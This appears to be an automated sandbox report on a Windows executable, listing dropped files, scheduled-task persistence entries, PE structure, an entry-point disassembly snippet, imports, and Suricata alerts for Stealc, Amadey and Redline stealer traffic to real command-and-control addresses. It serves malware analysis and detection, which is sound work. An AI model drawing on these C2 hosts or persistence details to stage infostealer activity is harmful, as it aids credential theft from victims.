Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.136624295551173
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AY:Y9KQOy6Lb1BA+9
MD5:	EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA1:	B43BC4B3EA206A02EF8F63D5BFAD0C96BF2A3B2A
SHA-256:	792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
SHA-512:	076EE83534F42563046D25086166F82E1A3EC61840C113AEC67ABE2D8195DAA247D827D0C54E7E8F8A1BBF2D082A3763577587E84342EC160FF97905243E6D19
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.136624295551173
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AY:Y9KQOy6Lb1BA+9
MD5:	EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA1:	B43BC4B3EA206A02EF8F63D5BFAD0C96BF2A3B2A
SHA-256:	792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
SHA-512:	076EE83534F42563046D25086166F82E1A3EC61840C113AEC67ABE2D8195DAA247D827D0C54E7E8F8A1BBF2D082A3763577587E84342EC160FF97905243E6D19
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true}

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\AppData\RoamingBKKFHIEGDH.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.4115109511295945
Encrypted:	false
SSDEEP:	6:B6Sxoh/VX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0l1X9zt0:BXofDQ1lOmeeDNfXV1Nzt0
MD5:	DC819C4A50FBB3A298DBCD24CEC53A2E
SHA1:	90E34FC4B874266271110161CCF788098E42E2F0
SHA-256:	6501BDA53DE82BCAB429342B49E0FB22C2D7F03A86EBE431F3E8057618E2CD44
SHA-512:	3F24F5CEAF674106BDF5DE4049BBFDDB4A9F6BF82A888F33B2D393D5AC287A7F992605C87ABBD05FEEA200F6A4005DE80E7DF505D839E6701F1DACAD021D53EA
Malicious:	false
Preview:	......c.o..I.G...-.7F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................9.@3P.........................

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\AppData\RoamingAEGIJKEHCA.exe
File Type:	data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	3.4522494088112645
Encrypted:	false
SSDEEP:	6:xl5tXUG5ZsUEZ+lX1cI1l6lm6tFXqYEp5t/uy0l1X9zt0:xl5ZYQ1cagxfXV1Nzt0
MD5:	790FCFE9427436CDA4ADAFD88F4AF294
SHA1:	F63CFBB69670A459E58BA2F68FFDA46F864C8A57
SHA-256:	42ADBA94AECDDE98E6A4A00755269F64888276821FF4D83CBA930E245457311A
SHA-512:	1B94BAE38D6AE5B3A34CFB85D592F9FBDD1D22E932A8BEFE16521A867FC2EE9F84CE0EA3741359F81CA8FB7CFA50F567276B11E757DA8851FACAF08CFB1EBE25
Malicious:	false
Preview:	..../gj.%.DN.Y...M&F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................9.@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.424054958667642
Encrypted:	false
SSDEEP:	6144:+Svfpi6ceLP/9skLmb0OTmWSPHaJG8nAgeMZMMhA2fX4WABlEnNA0uhiTw:dvloTmW+EZMM6DFye03w
MD5:	3C1ED44EC70DE0E87561ADE020D63521
SHA1:	A1B5D46AECC4ED7441CA7ACCAF6A083A91E90C1C
SHA-256:	4CE7A6A31079BAAE9C5AEFDB4D1F8351EADBC42E124A6F60932C5D5C8B4451FB
SHA-512:	031BC8D9E2449D08A328F6225EA46F4C9D355B9B20F3371ECF8A335ADB82A32ECD173BEC31B9EA57B30ACCD4D1D5A288603923E7BF03322C66CC57B6F1250378
Malicious:	false
Preview:	regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ<6^t................................................................................................................................................................................................................................................................................................................................................) j........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.026292517681221
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	250'368 bytes
MD5:	8e3c2682f9743107cb2b3a3d15b072f5
SHA1:	660a9b6ad3f5cd1bd37e04015b25a893de4c5f90
SHA256:	6322686d71a40e20eca9b41af872049e06aab4439a2d06e607e9620decfec41d
SHA512:	ca5c2366993fe09cc8f15ed6985f6e2f688ce11f1be6ecdc1a6b2dd40b1a1f505781b03236827cf5264aa836d733a59d98560700c8179da4940748d16079b0fe
SSDEEP:	3072:QcX/GzJvHQn9+skCBqUySy47R2ssdxMXwBF7F8G6gbLYf7H0FF3ad5:X/AJvHQnEayvvf7F8G/3k0vad
TLSH:	D134C01032B2D432F1E359308DB4F2B5662FBDA2BA75D4CBF6583B6F6E711818915322
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Lg.s... ... ... gpQ ... gpd ... gpP l.. .~i ... ... {.. gpU ... gp` ... gpg ... Rich... ........PE..L...lB.d...................

File Icon


Icon Hash:	cd4d3d2e4e054d07

Static PE Info

General

Entrypoint:	0x40204c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64A1426C [Sun Jul 2 09:25:00 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	a2e3230ae57fe05ccfafd273eef65a5b

Entrypoint Preview

Instruction
call 00007F0E94C777F2h
jmp 00007F0E94C73E8Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 00007F0E94C755F2h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 00007F0E94C74019h
call 00007F0E94C74FFFh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 00007F0E94C74134h
test al, 40h
je 00007F0E94C7400Fh
call 00007F0E94C74FE4h
mov dword ptr [eax], 00000022h
jmp 00007F0E94C73FE5h
push ebx
xor ebx, ebx
test al, 01h
je 00007F0E94C74018h
mov dword ptr [esi+04h], ebx
test al, 10h
je 00007F0E94C7408Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 00007F0E94C7402Eh
call 00007F0E94C7518Ah
add eax, 20h
cmp esi, eax
je 00007F0E94C7400Eh
call 00007F0E94C7517Eh
add eax, 40h
cmp esi, eax
jne 00007F0E94C7400Fh
push dword ptr [ebp+0Ch]
call 00007F0E94C78178h
pop ecx
test eax, eax
jne 00007F0E94C74009h
push esi
call 00007F0E94C78124h
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 00007F0E94C74086h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x258f4	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x204c000	0x9a08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2596c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x253b8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x1b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x219d0	0x21a00	9e0939958ea9d88428bdbc7d5145713e	False	0.8957074814126395	data	7.821310507065361	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x32e6	0x3400	58018bd814541f5d6419012a8a305afd	False	0.3518629807692308	data	4.950035863089329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x27000	0x2022e8c	0xdc00	8146e48ced3cb33bc604640471cc65ab	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yoboy	0x204a000	0x2d3	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tezanaz	0x204b000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x204c000	0x9a08	0x9c00	6db4fb61d7b454acc8fba80fbcb29a6d	False	0.41581530448717946	data	4.544208992821918	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x2052c98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x2053b40	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x20543e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_ICON	0x204c420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.47254797441364604
RT_ICON	0x204c420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.47254797441364604
RT_ICON	0x204d2c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5857400722021661
RT_ICON	0x204d2c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5857400722021661
RT_ICON	0x204db70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.6463133640552995
RT_ICON	0x204db70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.6463133640552995
RT_ICON	0x204e238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.703757225433526
RT_ICON	0x204e238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.703757225433526
RT_ICON	0x204e7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.3703319502074689
RT_ICON	0x204e7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.3703319502074689
RT_ICON	0x2050d48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	India	0.4629455909943715
RT_ICON	0x2050d48	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	Sri Lanka	0.4629455909943715
RT_ICON	0x2051df0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	India	0.5401639344262295
RT_ICON	0x2051df0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	Sri Lanka	0.5401639344262295
RT_ICON	0x2052778	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.6338652482269503
RT_ICON	0x2052778	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.6338652482269503
RT_STRING	0x2054be0	0x452	data	Tamil	India	0.45479204339963836
RT_STRING	0x2054be0	0x452	data	Tamil	Sri Lanka	0.45479204339963836
RT_STRING	0x2055038	0x28e	data	Tamil	India	0.481651376146789
RT_STRING	0x2055038	0x28e	data	Tamil	Sri Lanka	0.481651376146789
RT_STRING	0x20552c8	0x73e	data	Tamil	India	0.4261057173678533
RT_STRING	0x20552c8	0x73e	data	Tamil	Sri Lanka	0.4261057173678533
RT_ACCELERATOR	0x2052c58	0x40	data	Tamil	India	0.875
RT_ACCELERATOR	0x2052c58	0x40	data	Tamil	Sri Lanka	0.875
RT_GROUP_CURSOR	0x2054950	0x30	data			0.9375
RT_GROUP_ICON	0x2052be0	0x76	data	Tamil	India	0.6610169491525424
RT_GROUP_ICON	0x2052be0	0x76	data	Tamil	Sri Lanka	0.6610169491525424
RT_VERSION	0x2054980	0x260	data			0.5361842105263158

Imports

DLL	Import
KERNEL32.dll	SetEndOfFile, LocalCompact, SetEnvironmentVariableW, GetModuleHandleW, GetTickCount, CreateNamedPipeW, GetProcessHeap, GetConsoleAliasesA, EnumResourceTypesA, GetConsoleCP, GlobalAlloc, SetFileShortNameW, LoadLibraryW, IsProcessInJob, FatalAppExitW, AssignProcessToJobObject, IsBadCodePtr, ReplaceFileW, GetModuleFileNameW, GetSystemDirectoryA, GlobalUnlock, CreateJobObjectA, WriteConsoleInputW, GetProcAddress, VerLanguageNameW, LoadLibraryA, SetConsoleCtrlHandler, AddAtomW, HeapWalk, GetOEMCP, EnumDateFormatsA, GetModuleHandleA, EnumResourceNamesA, GetFileTime, PeekConsoleInputA, SetProcessShutdownParameters, GetDiskFreeSpaceExA, LCMapStringW, CreateFileW, HeapSize, FlushFileBuffers, FindVolumeClose, GetLastError, CreateFileA, HeapReAlloc, GetStringTypeW, WriteConsoleW, HeapFree, GetCommandLineW, HeapSetInformation, GetStartupInfoW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapAlloc, HeapCreate, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, MultiByteToWideChar, ReadFile, ExitProcess, SetFilePointer, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetConsoleMode, GetCPInfo, GetACP, IsValidCodePage, Sleep, RtlUnwind, SetStdHandle, IsProcessorFeaturePresent, CloseHandle
USER32.dll	GetMenu, CharUpperBuffW, SetCaretPos, GetMessageExtraInfo, DrawStateW, GetSysColorBrush
GDI32.dll	GetCharWidthI, GetCharABCWidthsI
WINHTTP.dll	WinHttpOpen
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T17:57:27.065937+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:57:31.941429+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:56:14.446725+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:57:31.366446+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:17.305996+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61515	443	192.168.2.5	5.75.212.60
2024-07-26T17:58:26.679694+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55778	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:19.510485+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:01.258993+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61453	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:10.089509+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	61186	80	192.168.2.5	185.215.113.16
2024-07-26T17:58:15.246953+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61508	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:22.098290+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:00.571174+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	61433	443	192.168.2.5	5.75.212.60
2024-07-26T17:58:23.340026+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	55750	34.149.100.209	192.168.2.5
2024-07-26T17:56:13.586679+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:58:38.161525+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55838	443	192.168.2.5	5.75.212.60
2024-07-26T17:58:47.387169+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55881	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:06.087522+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:56:04.072888+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:58.539633+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61420	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:49.404238+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	61178	20.114.59.183	192.168.2.5
2024-07-26T18:02:05.568048+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	56377	80	192.168.2.5	185.215.113.19
2024-07-26T17:57:05.139751+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	61181	80	192.168.2.5	185.215.113.16
2024-07-26T17:57:10.337457+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	61187	80	192.168.2.5	185.215.113.19
2024-07-26T17:57:22.850976+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	61238	80	192.168.2.5	85.28.47.31
2024-07-26T17:58:07.387205+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	61485	5.75.212.60	192.168.2.5
2024-07-26T17:57:28.046187+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:56:12.578232+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:56:05.997408+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:56:22.035871+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49705	80	192.168.2.5	185.215.113.16
2024-07-26T17:57:32.442571+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:57:07.703131+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	61183	80	192.168.2.5	185.215.113.19
2024-07-26T17:57:03.887649+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	61179	80	192.168.2.5	185.215.113.16
2024-07-26T17:57:30.099477+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:57:53.078925+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	61354	142.250.186.163	192.168.2.5
2024-07-26T17:57:04.154635+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	80	61179	185.215.113.16	192.168.2.5
2024-07-26T17:56:04.257921+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:57:19.789071+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	9137	61197	185.215.113.9	192.168.2.5
2024-07-26T17:57:21.395912+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:24.605351+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55759	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:07.031768+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:15.109701+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	61201	80	192.168.2.5	185.215.113.16
2024-07-26T17:57:08.531884+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	61184	80	192.168.2.5	185.215.113.16
2024-07-26T17:57:32.194077+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:57:05.563610+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	61181	185.215.113.16	192.168.2.5
2024-07-26T17:56:17.107939+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:58:39.485635+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55845	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:57.329275+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61390	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:08.769829+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	61185	80	192.168.2.5	85.28.47.31
2024-07-26T17:57:30.350748+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T18:00:27.231398+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	56131	80	192.168.2.5	185.215.113.16
2024-07-26T17:58:05.374501+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61485	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:14.736297+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:28.406356+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:57:59.900758+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61433	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:03.813470+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:57:30.606464+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:32.568055+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	55811	34.149.100.209	192.168.2.5
2024-07-26T17:56:05.297445+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:58:30.159676+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55797	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:05.855393+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:58:04.461907+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61477	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:06.364179+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:58:29.243498+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	55789	5.75.212.60	192.168.2.5
2024-07-26T17:56:05.990497+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:23.534927+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:23.702141+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55752	443	192.168.2.5	5.75.212.60
2024-07-26T17:58:16.311006+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61512	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:30.861034+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:57:10.353656+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	61186	80	192.168.2.5	185.215.113.16
2024-07-26T17:57:14.133397+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	9137	61197	185.215.113.9	192.168.2.5
2024-07-26T18:01:11.800386+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	56245	80	192.168.2.5	185.215.113.19
2024-07-26T17:58:32.567966+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	55811	34.149.100.209	192.168.2.5
2024-07-26T17:58:23.340117+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	55750	34.149.100.209	192.168.2.5
